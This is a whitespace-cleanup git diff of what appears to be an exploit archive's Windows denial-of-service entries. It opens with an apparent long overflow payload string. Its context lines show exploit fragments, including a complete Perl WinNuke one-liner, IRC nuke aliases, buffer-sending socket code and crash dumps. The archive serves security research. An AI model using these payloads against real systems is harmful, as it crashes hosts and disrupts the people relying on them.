aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb="cccc" > -</EMBED> +</EMBED> \ No newline at end of file diff --git a/platforms/windows/dos/2037.c b/platforms/windows/dos/2037.c index 77872826e..166b5416a 100755 --- a/platforms/windows/dos/2037.c +++ b/platforms/windows/dos/2037.c @@ -320,4 +320,4 @@ void std_err(void) { exit(1); } -// milw0rm.com [2006-07-19] +// milw0rm.com [2006-07-19] \ No newline at end of file diff --git a/platforms/windows/dos/20437.c b/platforms/windows/dos/20437.c index 017d76592..8fd763539 100755 --- a/platforms/windows/dos/20437.c +++ b/platforms/windows/dos/20437.c @@ -93,5 +93,4 @@ void main(int argc, char *argv[]) { close(s); } -/* - +/* \ No newline at end of file diff --git a/platforms/windows/dos/20438.pl b/platforms/windows/dos/20438.pl index dfad65a74..441587adf 100755 --- a/platforms/windows/dos/20438.pl +++ b/platforms/windows/dos/20438.pl @@ -8,4 +8,4 @@ As a result of this assumption not being met, Windows gives a "blue screen of de Windows port 139 (NetBIOS) is most susceptible to this attack. although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning. -perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"some.windoze.box:139")->send("bye",MSG_OOB)' +perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"some.windoze.box:139")->send("bye",MSG_OOB)' \ No newline at end of file diff --git a/platforms/windows/dos/20439.pl b/platforms/windows/dos/20439.pl index 5e6b6f230..551e002aa 100755 --- a/platforms/windows/dos/20439.pl +++ b/platforms/windows/dos/20439.pl @@ -25,5 +25,4 @@ socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; -print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S; - +print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S; \ No newline at end of file diff --git a/platforms/windows/dos/20440.irc b/platforms/windows/dos/20440.irc index ee469a5cf..92678a6d4 100755 --- a/platforms/windows/dos/20440.irc +++ b/platforms/windows/dos/20440.irc @@ -72,4 +72,4 @@ alias wnuke { /on -join * {@joinvar=[$0]} alias awnuke { /on -join * {/wnuke $0}} alias mwnuke { fe ($chanusers()) blah { /wnuke $blah }} -alias opwnuke { fe ($chops()) blah { /wnuke $blah }} +alias opwnuke { fe ($chops()) blah { /wnuke $blah }} \ No newline at end of file diff --git a/platforms/windows/dos/20464.py b/platforms/windows/dos/20464.py index caec5e97d..ec1d757e1 100755 --- a/platforms/windows/dos/20464.py +++ b/platforms/windows/dos/20464.py @@ -68,4 +68,4 @@ print "\nSending buffer 2" s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect(('xxx.xxx.xxx.xxx',5591)) s2.send(buffer2) -s2.close() +s2.close() \ No newline at end of file diff --git a/platforms/windows/dos/20470.txt b/platforms/windows/dos/20470.txt index 587d879fa..65bc0618e 100755 --- a/platforms/windows/dos/20470.txt +++ b/platforms/windows/dos/20470.txt @@ -9,5 +9,4 @@ connect reset; connect to sample user db2admin using db2admin; select * from employee where year(birthdate)=1999 and firstnme<''; -It is not known what the cause for this behaviour is. Restarting the application is required in order to regain normal functionality. - +It is not known what the cause for this behaviour is. Restarting the application is required in order to regain normal functionality. \ No newline at end of file diff --git a/platforms/windows/dos/20515.txt b/platforms/windows/dos/20515.txt index d7cffacc2..09357b907 100755 --- a/platforms/windows/dos/20515.txt +++ b/platforms/windows/dos/20515.txt @@ -12,4 +12,4 @@ Exploitation of this vulnerability could be more serious with repeated attacks. 2. Menu->Connect->Remote System=127.0.0.1 , Port=1026 3. Press 'Connect' button 4. When it is connects, type some random characters and press enter. -5. Close telnet.exe. +5. Close telnet.exe. \ No newline at end of file diff --git a/platforms/windows/dos/2057.c b/platforms/windows/dos/2057.c index 9f7fb18d8..cf5282248 100755 --- a/platforms/windows/dos/2057.c +++ b/platforms/windows/dos/2057.c @@ -127,4 +127,4 @@ recv(sock,(char *)recvbuff,sizeof(recvbuff),0); } -// milw0rm.com [2006-07-21] +// milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/platforms/windows/dos/20589.c b/platforms/windows/dos/20589.c index e27d8be7d..6c5cdae00 100755 --- a/platforms/windows/dos/20589.c +++ b/platforms/windows/dos/20589.c @@ -120,4 +120,4 @@ struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip) fprintf(stderr, "\n Packet send... \n\n" ); - return 1;} + return 1;} \ No newline at end of file diff --git a/platforms/windows/dos/20596.c b/platforms/windows/dos/20596.c index dcb4a0925..e047c49c0 100755 --- a/platforms/windows/dos/20596.c +++ b/platforms/windows/dos/20596.c @@ -29,5 +29,4 @@ int main(void) SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex", SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL); free(pDacl); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/20613.txt b/platforms/windows/dos/20613.txt index f7715c6bf..282f27025 100755 --- a/platforms/windows/dos/20613.txt +++ b/platforms/windows/dos/20613.txt @@ -9,4 +9,4 @@ for(i=0;i<m;i++) try { DatagramSocket d = new DatagramSocket();v.addElement(d);} catch (Exception e) {System.out.println("Exhausted, i="+i);} -} +} \ No newline at end of file diff --git a/platforms/windows/dos/20664.pl b/platforms/windows/dos/20664.pl index de993e682..18426bee2 100755 --- a/platforms/windows/dos/20664.pl +++ b/platforms/windows/dos/20664.pl @@ -38,5 +38,4 @@ close $socket; do vv(128008,"V"); # may need to change the length sleep(1); do vv(128008,"V"); -print "Done.\n"; - +print "Done.\n"; \ No newline at end of file diff --git a/platforms/windows/dos/20681.c b/platforms/windows/dos/20681.c index 77c600858..d4252b8c4 100755 --- a/platforms/windows/dos/20681.c +++ b/platforms/windows/dos/20681.c @@ -116,5 +116,4 @@ if ( (send(cons[sel], ahh, strlen(ahh), 0)) < 1) { exit(-1); } -/* [HeliSec] <=> [Helios Security and Administration] */ - +/* [HeliSec] <=> [Helios Security and Administration] */ \ No newline at end of file diff --git a/platforms/windows/dos/20784.cpp b/platforms/windows/dos/20784.cpp index ee885b0b3..22099d565 100755 --- a/platforms/windows/dos/20784.cpp +++ b/platforms/windows/dos/20784.cpp @@ -41,4 +41,4 @@ int main(){ } fclose(txtfile); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/20802.c b/platforms/windows/dos/20802.c index c2bc9334c..f8054fd04 100755 --- a/platforms/windows/dos/20802.c +++ b/platforms/windows/dos/20802.c @@ -135,8 +135,4 @@ void main(int argc,char **argv) printf("Sorry, %s is alive yet\n",argv[param+1]); } exit(0); -} - - - - +} \ No newline at end of file diff --git a/platforms/windows/dos/20812.c b/platforms/windows/dos/20812.c index e82cac408..447a63968 100755 --- a/platforms/windows/dos/20812.c +++ b/platforms/windows/dos/20812.c @@ -124,6 +124,4 @@ sockaddr_in))==-1) close(sock); return(0); -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/20814.c b/platforms/windows/dos/20814.c index 54d65580a..7cabfd590 100755 --- a/platforms/windows/dos/20814.c +++ b/platforms/windows/dos/20814.c @@ -139,4 +139,4 @@ return EX_OSERR; printf("Packet sent. Remote machine should be down.\n"); shutdown(mysock, 2); return EX_OK; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/20846.pl b/platforms/windows/dos/20846.pl index b631b2743..fe39cd226 100755 --- a/platforms/windows/dos/20846.pl +++ b/platforms/windows/dos/20846.pl @@ -53,6 +53,4 @@ sub FoundIt print "This machine \($IPaddress\) is affected\n"; exit(0); - } - - + } \ No newline at end of file diff --git a/platforms/windows/dos/20904.pl b/platforms/windows/dos/20904.pl index 1db094137..d10a9e7fa 100755 --- a/platforms/windows/dos/20904.pl +++ b/platforms/windows/dos/20904.pl @@ -29,5 +29,4 @@ if (connect (CLIENT, $serverAddr)) { } close (CLIENT); } else { die "Can't connect.\n"; } -print "Done.\n"; - +print "Done.\n"; \ No newline at end of file diff --git a/platforms/windows/dos/20917.txt b/platforms/windows/dos/20917.txt index c5edff640..61d38b8c6 100755 --- a/platforms/windows/dos/20917.txt +++ b/platforms/windows/dos/20917.txt @@ -164,5 +164,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. 0012F300 41414141 AAAA 0012F304 41414141 AAAA 0012F308 41414141 AAAA -0012F30C 41414141 AAAA - +0012F30C 41414141 AAAA \ No newline at end of file diff --git a/platforms/windows/dos/20930.c b/platforms/windows/dos/20930.c index b79ba7e4b..4b9911076 100755 --- a/platforms/windows/dos/20930.c +++ b/platforms/windows/dos/20930.c @@ -77,4 +77,4 @@ int main(int argc, char *argv[]) return 0; } - + \ No newline at end of file diff --git a/platforms/windows/dos/20949.c b/platforms/windows/dos/20949.c index 8bd7b06d1..7e8c0571f 100755 --- a/platforms/windows/dos/20949.c +++ b/platforms/windows/dos/20949.c @@ -81,5 +81,4 @@ int main(int argc, char *argv[]) { printf("Host is not vulnerable\n"); close(sockfd); } -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/20955.pl b/platforms/windows/dos/20955.pl index ac4f12ee9..dbde291f4 100755 --- a/platforms/windows/dos/20955.pl +++ b/platforms/windows/dos/20955.pl @@ -50,12 +50,4 @@ print " Creating Evil File , Please Wait ...\n\n\n"; sleep (5); print " Evil File Created Successfully , Happy Hunting :)\n"; -# Datasec Team . - - - - - - - - +# Datasec Team . \ No newline at end of file diff --git a/platforms/windows/dos/20957.pl b/platforms/windows/dos/20957.pl index c5802d665..c23652d51 100755 --- a/platforms/windows/dos/20957.pl +++ b/platforms/windows/dos/20957.pl @@ -32,4 +32,4 @@ if(defined($sock1)){ $sock1->close; } print "Finish!\n"; -exit(1); +exit(1); \ No newline at end of file diff --git a/platforms/windows/dos/20971.txt b/platforms/windows/dos/20971.txt index 579b5ed09..d1c40b8bd 100755 --- a/platforms/windows/dos/20971.txt +++ b/platforms/windows/dos/20971.txt @@ -68,4 +68,4 @@ may allow execution of arbitrary code, but requires tricking a user into opening =========== http://www.protekresearchlab.com/exploits/PRL-2012-27.png -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20971.png +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20971.png \ No newline at end of file diff --git a/platforms/windows/dos/20989.txt b/platforms/windows/dos/20989.txt index fd23cc23f..8bc1aa7fb 100755 --- a/platforms/windows/dos/20989.txt +++ b/platforms/windows/dos/20989.txt @@ -17,4 +17,4 @@ The end result of exploiting this vulnerability is that the server will crash an objFile.Close -%> +%> \ No newline at end of file diff --git a/platforms/windows/dos/21016.c b/platforms/windows/dos/21016.c index d4de6b0e3..19ce5b9e2 100755 --- a/platforms/windows/dos/21016.c +++ b/platforms/windows/dos/21016.c @@ -215,15 +215,4 @@ void sig_handler( int number ) } printf( "done.\n\n" ); exit( 1 ); -} - - - - - - - - - - - +} \ No newline at end of file diff --git a/platforms/windows/dos/21099.c b/platforms/windows/dos/21099.c index 4269100db..71e0ef76c 100755 --- a/platforms/windows/dos/21099.c +++ b/platforms/windows/dos/21099.c @@ -37,5 +37,4 @@ void main() getche(); CloseHandle(hPipe); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/21123.txt b/platforms/windows/dos/21123.txt index 1cd75bdf9..94b2cc8a2 100755 --- a/platforms/windows/dos/21123.txt +++ b/platforms/windows/dos/21123.txt @@ -6,4 +6,4 @@ Due to a flaw in the implementation of RDP in Windows 2000/NT Terminal Server, i Sending malformed RDP packets to a host could cause a denial of services, potentially impacting the Terminal service and other applications running on the affected host. 